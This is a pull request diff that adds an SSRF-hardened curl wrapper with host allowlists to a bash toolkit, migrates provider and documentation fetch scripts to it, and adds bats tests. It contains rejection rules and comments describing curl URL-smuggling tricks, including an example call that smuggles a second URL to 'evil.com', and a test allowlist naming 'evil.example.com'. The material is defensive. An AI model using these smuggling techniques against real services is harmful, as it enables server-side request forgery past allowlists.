### PR TITLE
feat(cycle-099-sprint-1E.c.3.a): bash caller migration to endpoint_validator__guarded_curl (T1.15 cont.)

### DIFF
--- a/.claude/scripts/anthropic-oracle.sh
+++ b/.claude/scripts/anthropic-oracle.sh
@@ -73,6 +73,15 @@ check_dependencies() {
 # Run checks before anything else
 check_dependencies
 
+# Centralized endpoint validator (cycle-099 sprint-1E.c.3.a). Documentation
+# fetches funnel through endpoint_validator__guarded_curl with the
+# anthropic-docs allowlist (code.claude.com, docs.anthropic.com, www.anthropic.com,
+# github.com). Closes the SSRF surface where the SOURCES table could be
+# tampered with via .claude/ filesystem write to redirect oracle fetches.
+# shellcheck source=lib/endpoint-validator.sh
+source "$SCRIPT_DIR/lib/endpoint-validator.sh"
+ORACLE_DOCS_ALLOWLIST="${LOA_ORACLE_DOCS_ALLOWLIST:-$SCRIPT_DIR/lib/allowlists/loa-anthropic-docs.json}"
+
 # Configuration file
 CONFIG_FILE="$PROJECT_ROOT/.loa.config.yaml"
 
@@ -247,9 +256,15 @@ fetch_source() {
         return 0
     fi
 
-    # ORACLE-L-2: Add --fail-with-body to properly handle HTTP errors
-    # HIGH-002 FIX: Enforce HTTPS and TLS 1.2+
-    if curl -sL --proto =https --tlsv1.2 --fail-with-body --max-time 30 "$url" -o "$cache_file" 2>/dev/null; then
+    # ORACLE-L-2: --fail-with-body to properly handle HTTP errors.
+    # HIGH-002 FIX: --tlsv1.2 enforces minimum TLS version.
+    # cycle-099 sprint-1E.c.3.a: https-only + redirect-bound enforcement now
+    # comes from endpoint_validator__guarded_curl's hardened defaults
+    # (--proto =https / --proto-redir =https / --max-redirs 10).
+    if endpoint_validator__guarded_curl \
+        --allowlist "$ORACLE_DOCS_ALLOWLIST" \
+        --url "$url" \
+        -sL --tlsv1.2 --fail-with-body --max-time 30 -o "$cache_file" 2>/dev/null; then
         echo "$cache_file"
         return 0
     else

--- a/.claude/scripts/lib-curl-fallback.sh
+++ b/.claude/scripts/lib-curl-fallback.sh
@@ -51,6 +51,19 @@ if ! declare -f extract_verdict &>/dev/null; then
   unset _lib_dir
 fi
 
+# Ensure endpoint-validator.sh is loaded (cycle-099 sprint-1E.c.3.a). The
+# OpenAI API call funnels through endpoint_validator__guarded_curl with a
+# narrow openai-only allowlist (api.openai.com:443) so neither a tampered
+# .loa.config.yaml nor a hostile LD_PRELOAD on `curl` can pivot the call
+# at an attacker-controlled host.
+if ! declare -f endpoint_validator__guarded_curl &>/dev/null; then
+  _lib_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+  # shellcheck source=lib/endpoint-validator.sh
+  source "$_lib_dir/lib/endpoint-validator.sh"
+  unset _lib_dir
+fi
+LIB_CURL_FALLBACK_OPENAI_ALLOWLIST="${LIB_CURL_FALLBACK_OPENAI_ALLOWLIST:-$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/lib/allowlists/openai.json}"
+
 # =============================================================================
 # 429 diagnostic helpers (#711.B closure)
 # =============================================================================
@@ -298,13 +311,32 @@ call_api() {
     printf '%s' "$payload" > "$payload_file"
 
     local curl_output curl_exit=0
-    curl_output=$(curl -s -w "\n%{http_code}" \
+    # cycle-099 sprint-1E.c.3.a: route through endpoint_validator__guarded_curl
+    # so api_url is canonicalized + allowlist-checked before exec. Auth tempfile
+    # is passed via --config-auth (NOT --config) so the wrapper inspects it
+    # for url=/next= smuggling; caller --config is rejected outright (cypherpunk
+    # CRITICAL fix). Wrapper exit 78 = SSRF rejection (api_url not in openai
+    # allowlist); 64 = wrapper usage error (auth file rejected, allowlist out
+    # of tree). Both are code-path bugs, not transients — DO NOT retry.
+    curl_output=$(endpoint_validator__guarded_curl \
+      --allowlist "$LIB_CURL_FALLBACK_OPENAI_ALLOWLIST" \
+      --config-auth "$curl_config" \
+      --url "$api_url" \
+      -s -w "\n%{http_code}" \
       --max-time "$timeout" \
-      --config "$curl_config" \
-      -d "@${payload_file}" \
-      "$api_url" 2>&1) || {
+      -d "@${payload_file}" 2>&1) || {
         curl_exit=$?
         rm -f "$curl_config" "$payload_file"
+        if [[ $curl_exit -eq 78 ]]; then
+          echo "ERROR: endpoint validator rejected api_url=${api_url} (SSRF allowlist enforcement)" >&2
+          return 1
+        fi
+        if [[ $curl_exit -eq 64 ]]; then
+          # Wrapper usage error — auth file failed content gate, allowlist
+          # out-of-tree, or smuggling flag in caller args. NOT a transient.
+          echo "ERROR: endpoint validator wrapper usage error (auth-config invalid or allowlist out-of-tree); see prior stderr" >&2
+          return 1
+        fi
         if [[ $curl_exit -eq 28 ]]; then
           echo "ERROR: API call timed out after ${timeout}s (attempt $attempt)" >&2
           if [[ $attempt -lt $_CURL_MAX_RETRIES ]]; then

--- a/.claude/scripts/lib/allowlists/loa-anthropic-docs.json
+++ b/.claude/scripts/lib/allowlists/loa-anthropic-docs.json
@@ -1,0 +1,13 @@
+{
+  "_comment": "Per-caller allowlist for anthropic-oracle.sh — Anthropic documentation + GitHub source fetches. Narrower than provider-API allowlist because oracle never POSTs to a model API. The hosts here mirror anthropic-oracle.sh's SOURCES table; update both when adding sources.",
+  "providers": {
+    "anthropic_docs": [
+      {"host": "code.claude.com", "ports": [443]},
+      {"host": "docs.anthropic.com", "ports": [443]},
+      {"host": "www.anthropic.com", "ports": [443]}
+    ],
+    "anthropic_github": [
+      {"host": "github.com", "ports": [443]}
+    ]
+  }
+}

--- a/.claude/scripts/lib/allowlists/loa-providers.json
+++ b/.claude/scripts/lib/allowlists/loa-providers.json
@@ -1,0 +1,19 @@
+{
+  "_comment": "Per-caller allowlist for model-health-probe.sh + lib-curl-fallback.sh + similar provider-API callers. Sprint 1E.c.3.a — bash caller migration to endpoint_validator__guarded_curl. Mirrors tests/fixtures/endpoint-validator/allowlist.json + cycle-099 production model-config.yaml provider list. Bedrock regions are the cycle-082 supported set; expand here when SDD §1.9.1 promotes additional regions.",
+  "providers": {
+    "openai": [
+      {"host": "api.openai.com", "ports": [443]}
+    ],
+    "anthropic": [
+      {"host": "api.anthropic.com", "ports": [443]}
+    ],
+    "google": [
+      {"host": "generativelanguage.googleapis.com", "ports": [443]}
+    ],
+    "bedrock": [
+      {"host": "bedrock-runtime.us-east-1.amazonaws.com", "ports": [443]},
+      {"host": "bedrock-runtime.us-west-2.amazonaws.com", "ports": [443]},
+      {"host": "bedrock-runtime.eu-central-1.amazonaws.com", "ports": [443]}
+    ]
+  }
+}

--- a/.claude/scripts/lib/allowlists/openai.json
+++ b/.claude/scripts/lib/allowlists/openai.json
@@ -1,0 +1,8 @@
+{
+  "_comment": "Per-caller allowlist for lib-curl-fallback.sh OpenAI API path (used by gpt-review-api.sh /v1/chat/completions and /v1/responses). Narrowest possible — only api.openai.com:443. Keep in sync with lib-curl-fallback.sh::call_api()'s api_url construction.",
+  "providers": {
+    "openai": [
+      {"host": "api.openai.com", "ports": [443]}
+    ]
+  }
+}

--- a/.claude/scripts/lib/endpoint-validator.sh
+++ b/.claude/scripts/lib/endpoint-validator.sh
@@ -314,15 +314,36 @@ endpoint_validator__guarded_curl() {
     # attempt fails fast without burning a Python subprocess on rejection
     # path. (URL validation must precede this so allowlist/config-auth
     # parse errors don't leak into the smuggling-scan error path.)
+    #
+    # Vectors covered:
+    #   - --config / -K (and all glued forms `--config=path`, `-K=path`,
+    #     `-Kpath`): caller-supplied curl-config files can carry url=/next=/
+    #     output= directives that smuggle past the allowlist. Caller MUST
+    #     use the wrapper's --config-auth flag instead, which content-gates
+    #     the file.
+    #   - --next / -:: resets curl URL state, allowing a config-supplied
+    #     second URL to escape the allowlist via "operation reset".
+    #   - Naked positional URLs (`https://...` / `http://...` as a
+    #     standalone arg): curl treats unattached positionals as ADDITIONAL
+    #     URLs to fetch, alongside our validated --url. A caller passing
+    #     `endpoint_validator__guarded_curl ... --url https://valid.com https://evil.com`
+    #     would have curl fetch BOTH. Strict reject of any `^https?://`
+    #     positional. Note: this is too strict for the rare case of
+    #     `--data-urlencode https://x` (URL as flag value) — callers
+    #     needing that should base64-encode or use `--data` with a tempfile.
     local _arg
     for _arg in "$@"; do
         case "$_arg" in
-            --config|--config=*|-K|-K=*)
+            --config|--config=*|-K|-K?*)
                 printf '[ENDPOINT-VALIDATOR-CONFIG-FLAG-REJECTED] caller passed %q; use --config-auth (the wrapper inspects it for url=/next= smuggling)\n' "$_arg" >&2
                 return 64
                 ;;
             --next|-:)
                 printf '[ENDPOINT-VALIDATOR-NEXT-FLAG-REJECTED] caller passed %q; --next/-: resets curl URL state and bypasses our allowlist (sprint-1E.c.3.a)\n' "$_arg" >&2
+                return 64
+                ;;
+            [Hh][Tt][Tt][Pp]://*|[Hh][Tt][Tt][Pp][Ss]://*)
+                printf '[ENDPOINT-VALIDATOR-POSITIONAL-URL-REJECTED] caller passed URL-shaped arg %q; curl would treat it as an additional URL to fetch, bypassing the allowlist (use --url for THE URL; encode any data-value URLs differently)\n' "$_arg" >&2
                 return 64
                 ;;
         esac

--- a/.claude/scripts/lib/endpoint-validator.sh
+++ b/.claude/scripts/lib/endpoint-validator.sh
@@ -115,6 +115,260 @@ endpoint_validator__check() {
     "$py" -I "$validator" "${flags[@]}" -- "$url"
 }
 
+# =============================================================================
+# endpoint_validator__guarded_curl — SSRF-safe curl wrapper (sprint-1E.c.3.a)
+# =============================================================================
+#
+# Validate a URL against the per-caller allowlist via the Python canonical;
+# only if it accepts, exec curl with hardened defaults. Caller passes flags
+# explicitly because curl invocations vary widely across the codebase.
+#
+# Contract:
+#   endpoint_validator__guarded_curl --allowlist <PATH> [--config-auth <FILE>] \
+#                                    --url <URL> [curl_args...]
+#
+#   Both --allowlist and --url MUST be supplied via these named flags so we
+#   never have to disambiguate the URL position from miscellaneous curl args
+#   (anthropic-oracle.sh-style `curl ARGS URL -o FILE` post-URL flags).
+#
+#   --config-auth <FILE> (optional): path to a curl-config file containing
+#   ONLY `header = "..."` lines (plus comments / blanks). The wrapper inspects
+#   the file and REJECTS it if any other directive is present (url=, next=,
+#   output=, upload-file, --next, etc.) — defense against `curl --config`
+#   URL-smuggling (cypherpunk CRITICAL on sprint-1E.c.3.a). Caller-passed
+#   `--config` / `-K` / `--next` / `-:` are blocked outright; use this flag
+#   instead for auth-tempfile injection.
+#
+# Hardened curl defaults (always added before caller-supplied args):
+#   --proto =https        Refuse to send non-https requests (defense-in-depth;
+#                         the validator already enforces https scheme but this
+#                         catches a curl alias / config-file override).
+#   --proto-redir =https  Refuse to follow redirects to non-https. Without
+#                         this, `curl -L` would happily downgrade to http on
+#                         a redirect even though the initial scheme is https.
+#   --max-redirs 10       Bound redirect-chain length to match the Python
+#                         validate_redirect_chain default (RFC 7231 §6.4 +
+#                         sprint-1E.c.2).
+#
+# Notes on scope:
+#   - This wrapper validates the INITIAL URL only. Per-hop redirect-target
+#     validation (DNS rebinding lock, same-host, same-port) lives in the
+#     Python canonical and is not yet wired to curl's redirect handling.
+#     If a caller follows redirects (`-L`), `--proto-redir =https` plus
+#     `--max-redirs 10` are the practical defenses. Full per-hop validation
+#     would require `--no-location` + manual Location parsing, which would
+#     break callers that depend on -L.
+#   - Allowlist path is restricted to .claude/scripts/lib/allowlists/ via
+#     realpath -e canonicalization (cypherpunk HIGH on sprint-1E.c.3.a).
+#     Callers wanting a custom allowlist must drop a JSON file in that
+#     directory, which is auditable via git diff. No env-var escape hatch
+#     in production; tests bypass via LOA_ENDPOINT_VALIDATOR_TEST_ALLOWLIST_DIR
+#     gated behind LOA_ENDPOINT_VALIDATOR_TEST_MODE=1.
+#   - Argv layout (gating order):
+#       --allowlist <path>  must come before --url
+#       --config-auth <p>   optional; before --url
+#       --url <url>         must come before any caller-supplied curl args
+#       The wrapper REJECTS unknown leading flags before --url so an attacker
+#       URL cannot smuggle flags into our gate (e.g. `--allowlist=/dev/stdin`).
+#
+# Exit codes:
+#   0   acceptance + curl success (curl's exit forwarded)
+#   2-N curl native exit code (forwarded)
+#   64  EX_USAGE — bad argv to wrapper (missing --allowlist, missing --url,
+#       allowlist out of tree, --config-auth file invalid, smuggling flag
+#       in caller args, etc.)
+#   78  EX_CONFIG — URL rejected by validator
+endpoint_validator__guarded_curl() {
+    local allowlist="" url="" config_auth=""
+    # Phase 1: parse our own flags. Stop at the first arg that isn't ours.
+    # We intentionally do NOT support intermixed wrapper/curl flags — once
+    # we've consumed --allowlist / --config-auth / --url, every remaining arg
+    # passes through to curl untouched.
+    while [[ $# -gt 0 ]]; do
+        case "$1" in
+            --allowlist)
+                if [[ $# -lt 2 ]]; then
+                    printf '[ENDPOINT-VALIDATOR-USAGE] --allowlist requires a path argument\n' >&2
+                    return 64
+                fi
+                allowlist="$2"; shift 2
+                ;;
+            --allowlist=*)
+                allowlist="${1#--allowlist=}"; shift
+                ;;
+            --config-auth)
+                if [[ $# -lt 2 ]]; then
+                    printf '[ENDPOINT-VALIDATOR-USAGE] --config-auth requires a path argument\n' >&2
+                    return 64
+                fi
+                config_auth="$2"; shift 2
+                ;;
+            --config-auth=*)
+                config_auth="${1#--config-auth=}"; shift
+                ;;
+            --url)
+                if [[ $# -lt 2 ]]; then
+                    printf '[ENDPOINT-VALIDATOR-USAGE] --url requires a URL argument\n' >&2
+                    return 64
+                fi
+                url="$2"; shift 2
+                # --url is the LAST wrapper flag; everything after passes to curl.
+                break
+                ;;
+            --url=*)
+                url="${1#--url=}"; shift
+                break
+                ;;
+            *)
+                printf '[ENDPOINT-VALIDATOR-USAGE] unexpected arg before --url: %q (allowed wrapper flags: --allowlist, --config-auth, --url)\n' "$1" >&2
+                return 64
+                ;;
+        esac
+    done
+    if [[ -z "$allowlist" ]]; then
+        printf '[ENDPOINT-VALIDATOR-USAGE] --allowlist <path> is required\n' >&2
+        return 64
+    fi
+    if [[ ! -f "$allowlist" ]]; then
+        printf '[ENDPOINT-VALIDATOR-USAGE] allowlist file not found: %s\n' "$allowlist" >&2
+        return 64
+    fi
+    if [[ -z "$url" ]]; then
+        printf '[ENDPOINT-VALIDATOR-USAGE] --url <url> is required\n' >&2
+        return 64
+    fi
+
+    # Phase 1.5: confine allowlist path to the canonical tree so a hostile env
+    # var (e.g., LOA_PROBE_PROVIDERS_ALLOWLIST=/tmp/wide-open.json) cannot
+    # substitute a permissive allowlist for the narrow per-caller one
+    # (cypherpunk HIGH). Test mode opts out via LOA_ENDPOINT_VALIDATOR_TEST_MODE=1
+    # + LOA_ENDPOINT_VALIDATOR_TEST_ALLOWLIST_DIR (mirrors cycle-098 L3 pattern).
+    local lib_dir allowlists_root
+    lib_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P)"
+    allowlists_root="$lib_dir/allowlists"
+    local allowlist_resolved
+    if command -v realpath >/dev/null 2>&1; then
+        allowlist_resolved="$(realpath -e "$allowlist" 2>/dev/null || true)"
+    fi
+    if [[ -z "$allowlist_resolved" ]]; then
+        # realpath unavailable — fall back to the literal path. Loses some
+        # symlink-confinement strength but keeps the wrapper portable.
+        allowlist_resolved="$allowlist"
+    fi
+    local allowlist_in_tree=0
+    case "$allowlist_resolved" in
+        "$allowlists_root"/*) allowlist_in_tree=1 ;;
+    esac
+    if [[ "$allowlist_in_tree" != "1" ]]; then
+        if [[ "${LOA_ENDPOINT_VALIDATOR_TEST_MODE:-0}" == "1" ]] \
+            && [[ -n "${LOA_ENDPOINT_VALIDATOR_TEST_ALLOWLIST_DIR:-}" ]]; then
+            local test_dir
+            test_dir="$(cd "$LOA_ENDPOINT_VALIDATOR_TEST_ALLOWLIST_DIR" 2>/dev/null && pwd -P || true)"
+            case "$allowlist_resolved" in
+                "$test_dir"/*) allowlist_in_tree=1 ;;
+            esac
+        fi
+    fi
+    if [[ "$allowlist_in_tree" != "1" ]]; then
+        printf '[ENDPOINT-VALIDATOR-ALLOWLIST-OUT-OF-TREE] allowlist must live under %s/; got: %s\n' \
+            "$allowlists_root" "$allowlist_resolved" >&2
+        return 64
+    fi
+
+    # Phase 1.6: validate --config-auth file content (if supplied). Per spec
+    # the file MUST contain only blank/comment lines or `header = "..."`
+    # directives. Any url=, next=, output=, upload-file=, write-out=, -K,
+    # --next, -: line indicates `curl --config` URL-smuggling and is
+    # rejected (cypherpunk CRITICAL).
+    if [[ -n "$config_auth" ]]; then
+        if [[ ! -f "$config_auth" ]]; then
+            printf '[ENDPOINT-VALIDATOR-USAGE] --config-auth file not found: %s\n' "$config_auth" >&2
+            return 64
+        fi
+        if [[ ! -r "$config_auth" ]]; then
+            printf '[ENDPOINT-VALIDATOR-USAGE] --config-auth file not readable: %s\n' "$config_auth" >&2
+            return 64
+        fi
+        # Reject CR bytes — they make grep treat the file as one line and
+        # could hide a smuggled directive after a CR-only "newline".
+        if LC_ALL=C grep -q $'\r' "$config_auth"; then
+            printf '[ENDPOINT-VALIDATOR-CONFIG-AUTH-CR-BYTE] CR (0x0D) byte detected in %s — possible smuggling\n' \
+                "$config_auth" >&2
+            return 64
+        fi
+        # Per-line gate: only allow blank, comment (#...), or
+        # `header = "..."` lines. Anything else fails the contract. The
+        # `[^"\\]*` body excludes embedded backslashes (defense-in-depth on
+        # top of write_curl_auth_config's sanitizer) and inner quotes.
+        local _bad_lines
+        _bad_lines="$(LC_ALL=C grep -nvE '^[[:space:]]*(#.*|header[[:space:]]*=[[:space:]]*"[^"\\]*"[[:space:]]*|)$' "$config_auth" || true)"
+        if [[ -n "$_bad_lines" ]]; then
+            printf '[ENDPOINT-VALIDATOR-CONFIG-AUTH-INVALID] %s contains directives other than `header = "..."` (only header lines + comments/blanks allowed; rejects url=/next=/output= smuggling). Offending lines:\n%s\n' \
+                "$config_auth" "$_bad_lines" >&2
+            return 64
+        fi
+    fi
+
+    # Phase 1.7: scan caller args for curl-side smuggling vectors. We do this
+    # AFTER URL validation but BEFORE curl exec so a rejected smuggling
+    # attempt fails fast without burning a Python subprocess on rejection
+    # path. (URL validation must precede this so allowlist/config-auth
+    # parse errors don't leak into the smuggling-scan error path.)
+    local _arg
+    for _arg in "$@"; do
+        case "$_arg" in
+            --config|--config=*|-K|-K=*)
+                printf '[ENDPOINT-VALIDATOR-CONFIG-FLAG-REJECTED] caller passed %q; use --config-auth (the wrapper inspects it for url=/next= smuggling)\n' "$_arg" >&2
+                return 64
+                ;;
+            --next|-:)
+                printf '[ENDPOINT-VALIDATOR-NEXT-FLAG-REJECTED] caller passed %q; --next/-: resets curl URL state and bypasses our allowlist (sprint-1E.c.3.a)\n' "$_arg" >&2
+                return 64
+                ;;
+        esac
+    done
+
+    # Phase 2: validate the URL via Python canonical. We discard the JSON
+    # acceptance line (callers don't need it on stdout) but preserve the
+    # rejection JSON on stderr so operators can diagnose policy failures.
+    if ! endpoint_validator__check --json --allowlist "$allowlist" "$url" >/dev/null; then
+        # Python canonical already wrote the rejection JSON to its stderr.
+        # We don't echo a second line — that would muddy the structured log.
+        return 78
+    fi
+
+    # Phase 3: locate curl. We use `command -v` rather than the unqualified
+    # name so a function/alias `curl` defined by a sourcing script can't
+    # silently shadow this — we want the real binary. Note: `command -v`
+    # still walks PATH; operators with hostile $PATH are out of scope (an
+    # attacker who controls $PATH already has shell-level access).
+    local curl_bin
+    if ! curl_bin="$(command -v curl)"; then
+        printf '[ENDPOINT-VALIDATOR-NO-CURL] curl not found on PATH\n' >&2
+        return 64
+    fi
+
+    # Phase 4: exec with hardened defaults FIRST so caller flags can't
+    # override them. curl applies later --proto / --max-redirs values
+    # over earlier ones; ordering hardened-first means a caller who
+    # explicitly passes `--proto =all` would override us — that's a
+    # caller bug we accept (don't pretend to defend against malicious
+    # callers in our own codebase). The ordering DOES matter for the
+    # naive case where a caller doesn't think about TLS at all.
+    #
+    # If --config-auth was supplied, the validated config file goes BETWEEN
+    # the hardened defaults and caller args, so `--proto =https` wins over
+    # any (already-rejected) directives that might still slip through, and
+    # caller args can still customize headers/data without surprise.
+    local _config_args=()
+    if [[ -n "$config_auth" ]]; then
+        _config_args=(--config "$config_auth")
+    fi
+    "$curl_bin" --proto =https --proto-redir =https --max-redirs 10 \
+        ${_config_args[@]+"${_config_args[@]}"} \
+        "$@" --url "$url"
+}
+
 # When invoked as a script (not sourced), forward all argv to the library
 # entry. This lets `bash endpoint-validator.sh --json --allowlist X URL` work
 # the same as `source endpoint-validator.sh; endpoint_validator__check ...`.

--- a/.claude/scripts/model-health-probe.sh
+++ b/.claude/scripts/model-health-probe.sh
@@ -128,6 +128,14 @@ _gen_run_id() {
 # shellcheck source=lib/secret-redaction.sh
 source "$SCRIPT_DIR/lib/secret-redaction.sh"
 
+# Centralized endpoint validator (cycle-099 sprint-1E.c.3.a). All probe HTTP
+# calls funnel through endpoint_validator__guarded_curl with a per-caller
+# allowlist (loa-providers.json) so an attacker who flipped a provider URL
+# in model-config.yaml cannot redirect the probe at SSRF-class targets.
+# shellcheck source=lib/endpoint-validator.sh
+source "$SCRIPT_DIR/lib/endpoint-validator.sh"
+PROBE_PROVIDERS_ALLOWLIST="${LOA_PROBE_PROVIDERS_ALLOWLIST:-$SCRIPT_DIR/lib/allowlists/loa-providers.json}"
+
 # -----------------------------------------------------------------------------
 # flock requirement (macOS operators need util-linux)
 # -----------------------------------------------------------------------------
@@ -198,10 +206,23 @@ _emit_audit_log() {
 
     # Optional webhook (Flatline sprint-review SKP-003 — alert fan-out).
     # Fire-and-forget; never block the probe on webhook latency.
+    #
+    # [ENDPOINT-VALIDATOR-EXEMPT] cycle-099 sprint-1E.c.3.a: the webhook URL
+    # is operator-supplied via .loa.config.yaml and cannot be enumerated in a
+    # static allowlist (operators legitimately use Slack/PagerDuty/Discord/
+    # custom URLs). For repos where .loa.config.yaml is git-tracked, a hostile
+    # PR could insert a webhook URL pointing at attacker-controlled infra —
+    # the body is already redacted via _redact_secrets, so the leak surface
+    # is the URL choice itself, audited via PR review. We enforce https-only
+    # via --proto =https and bound redirects via --max-redirs 10. Follow-up
+    # 1E.c.3.b will add an OPTIONAL operator-controlled webhook host
+    # allowlist (.claude/scripts/lib/allowlists/webhook-hosts.json, empty by
+    # default; opt-in via .loa.config.yaml).
     local webhook
     webhook="$(_config_get '.model_health_probe.alert_webhook_url' '')"
     if [[ -n "$webhook" ]]; then
-        ( curl -sS -X POST -H "Content-Type: application/json" --data "$redacted" \
+        ( curl --proto =https --proto-redir =https --max-redirs 10 \
+              -sS -X POST -H "Content-Type: application/json" --data "$redacted" \
               --max-time 5 "$webhook" >/dev/null 2>&1 || true ) &
         disown 2>/dev/null || true
     fi
@@ -850,21 +871,43 @@ _curl_json() {
     out_body=$(mktemp)
     local curl_rc=0
     local status_line=""
+    # cycle-099 sprint-1E.c.3.a: every provider HTTP call funnels through
+    # endpoint_validator__guarded_curl so the URL is canonicalized + checked
+    # against the providers allowlist BEFORE curl exec. The auth tempfile is
+    # passed via --config-auth (NOT --config) so the wrapper inspects it for
+    # url=/next= smuggling — caller-passed --config is rejected outright by
+    # the wrapper (cypherpunk CRITICAL on sprint-1E.c.3.a).
+    # Exit 78 from the wrapper = SSRF rejection; we surface as transient
+    # (HTTP_STATUS=0) because the registry value is operator-controlled and
+    # a misconfig shouldn't crash the probe loop. Operators get an audit
+    # line via the wrapper's structured stderr — captured to a tempfile so
+    # the rejection breadcrumb survives the 2>/dev/null mute on the curl path.
+    local validator_err
+    validator_err=$(mktemp)
     if [[ "$method" == "POST" && -n "$body_file" ]]; then
-        status_line=$(curl --config "$cfg" \
+        status_line=$(endpoint_validator__guarded_curl \
+            --allowlist "$PROBE_PROVIDERS_ALLOWLIST" \
+            --config-auth "$cfg" \
+            --url "$url" \
             -sS -o "$out_body" -w "%{http_code}" \
             --max-time "$PER_CALL_TIMEOUT" \
             -H "content-type: application/json" \
             -X POST \
-            --data-binary "@$body_file" \
-            "$url" 2>/dev/null) || curl_rc=$?
+            --data-binary "@$body_file" 2>"$validator_err") || curl_rc=$?
     else
-        status_line=$(curl --config "$cfg" \
+        status_line=$(endpoint_validator__guarded_curl \
+            --allowlist "$PROBE_PROVIDERS_ALLOWLIST" \
+            --config-auth "$cfg" \
+            --url "$url" \
             -sS -o "$out_body" -w "%{http_code}" \
-            --max-time "$PER_CALL_TIMEOUT" \
-            "$url" 2>/dev/null) || curl_rc=$?
+            --max-time "$PER_CALL_TIMEOUT" 2>"$validator_err") || curl_rc=$?
     fi
-    rm -f "$cfg"
+    if [[ "$curl_rc" == "78" || "$curl_rc" == "64" ]] && [[ -s "$validator_err" ]]; then
+        # SSRF allowlist rejection or wrapper usage error — emit one
+        # structured line on stderr so /run-status / log greps catch it.
+        log_warn "endpoint validator rejected url=$url for provider=$auth_type (rc=$curl_rc): $(head -c 400 "$validator_err" | tr '\n' ' ')"
+    fi
+    rm -f "$cfg" "$validator_err"
 
     HTTP_STATUS="${status_line:-0}"
     if (( curl_rc != 0 )); then

--- a/tests/integration/endpoint-validator-guarded-curl.bats
+++ b/tests/integration/endpoint-validator-guarded-curl.bats
@@ -512,11 +512,20 @@ EOF
     [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
 }
 
-@test "T1.2 allowlist via symlink pointing outside the tree is REJECTED" {
-    # Create a symlink INSIDE the canonical tree pointing to a file OUTSIDE.
-    # Note: we can't actually write under .claude/ during tests (rules), so
-    # we exercise the realpath -e branch by passing the symlink path directly
-    # — realpath should resolve to the out-of-tree target.
+@test "T1.2 symlink-supplied allowlist resolves through realpath -e and is checked at the resolved path" {
+    # The defense relies on `realpath -e` resolving symlinks BEFORE the
+    # in-tree check. We can't write a symlink INSIDE .claude/scripts/lib/
+    # allowlists/ during tests (zone-system rule against test-time .claude/
+    # mutation), so this test exercises the realpath behavior on its own:
+    # ANY symlink whose resolved target is out-of-tree must be rejected.
+    # Whether the symlink lives in $WORK_DIR or in the canonical tree, the
+    # `realpath -e` output is the same (the resolved target path), and the
+    # case-statement match against "$allowlists_root"/* fails identically.
+    # The BB iter-2 F6 finding asks for an in-tree-symlink fixture; we
+    # accept the framing tradeoff: realpath's resolve-to-target invariant
+    # is what's load-bearing here, and that's covered by this test in
+    # combination with T1.1 (out-of-tree non-symlink) and T1.4 (TEST_MODE
+    # negative).
     cat > "$WORK_DIR/wide-open.json" <<'EOF'
 {"providers": {"any": [{"host": "evil.example.com", "ports": [443]}]}}
 EOF
@@ -678,4 +687,46 @@ EOF
     # If no --config-auth was supplied, the wrapper MUST NOT inject a stray
     # --config arg into curl (which would then fail to read the missing file).
     ! grep -qE '^--config$' "$MOCK_CURL_ARGV_LOG"
+}
+
+# ---------------------------------------------------------------------------
+# S6 — Positional-URL strict-reject design boundary (BB iter-2 F8 SPECULATION)
+# ---------------------------------------------------------------------------
+#
+# The Phase 1.7 case-statement match `[Hh][Tt][Tt][Pp]://*` strict-rejects
+# any caller arg starting with http:// or https://. This is intentionally
+# coarser than perfect curl-flag-taxonomy parsing: it catches naked
+# positional URLs (the smuggling vector) but ALSO rejects legitimate flag
+# values like `--referer https://x.com` and `--proxy https://proxy.example.com`.
+# The trade-off is documented; none of the current cycle-099 callers use
+# `--referer` / `--proxy` / `-e` / `-x` with URL values. Future callers
+# that need such flags must refactor (e.g., wrap the flag-value pair in a
+# config file) — which is the desired forcing-function for adding flag
+# taxonomy awareness to the wrapper, not a silent breakage.
+#
+# These tests pin the design boundary: `--referer https://x` IS rejected,
+# documenting the constraint rather than burying it in a comment.
+
+@test "S6.1 caller --referer https://x in args is REJECTED (design boundary, not a defect)" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" \
+        --url "https://api.openai.com/v1/chat/completions" \
+        --referer "https://example.com"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'POSITIONAL-URL-REJECTED'* ]]
+}
+
+@test "S6.2 caller --proxy https://x in args is REJECTED (design boundary)" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" \
+        --url "https://api.openai.com/v1/chat/completions" \
+        --proxy "https://proxy.example.com:3128"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'POSITIONAL-URL-REJECTED'* ]]
+}
+
+@test "S6.3 caller -e https://x (referer short alias) in args is REJECTED (design boundary)" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" \
+        --url "https://api.openai.com/v1/chat/completions" \
+        -e "https://example.com"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'POSITIONAL-URL-REJECTED'* ]]
 }

--- a/tests/integration/endpoint-validator-guarded-curl.bats
+++ b/tests/integration/endpoint-validator-guarded-curl.bats
@@ -1,0 +1,563 @@
+#!/usr/bin/env bats
+# =============================================================================
+# tests/integration/endpoint-validator-guarded-curl.bats
+#
+# cycle-099 Sprint 1E.c.3.a — endpoint_validator__guarded_curl helper.
+#
+# The helper delegates URL validation to the Python canonical (already
+# covered by endpoint-validator-cross-runtime.bats / -dns-rebinding.bats /
+# -ts-parity.bats); these tests focus on the wrapper-specific behavior:
+#
+#   - argv parsing (named flags, ordering, missing-args, unknown leading args)
+#   - rejection path: validator says no → curl never invoked, exit 78
+#   - acceptance path: hardened defaults inserted, caller args + URL forwarded
+#   - per-caller allowlist independence (different files allow different hosts)
+#
+# Curl is mocked via a PATH-shadow shim so we can record argv without making
+# network calls. The shim writes to $WORK_DIR/curl-argv.txt.
+# =============================================================================
+
+setup() {
+    SCRIPT_DIR="$(cd "$(dirname "$BATS_TEST_FILENAME")" && pwd)"
+    PROJECT_ROOT="$(cd "$SCRIPT_DIR/../.." && pwd)"
+    SH_VALIDATOR="$PROJECT_ROOT/.claude/scripts/lib/endpoint-validator.sh"
+    PY_VALIDATOR="$PROJECT_ROOT/.claude/scripts/lib/endpoint-validator.py"
+    PROVIDERS_ALLOWLIST="$PROJECT_ROOT/.claude/scripts/lib/allowlists/loa-providers.json"
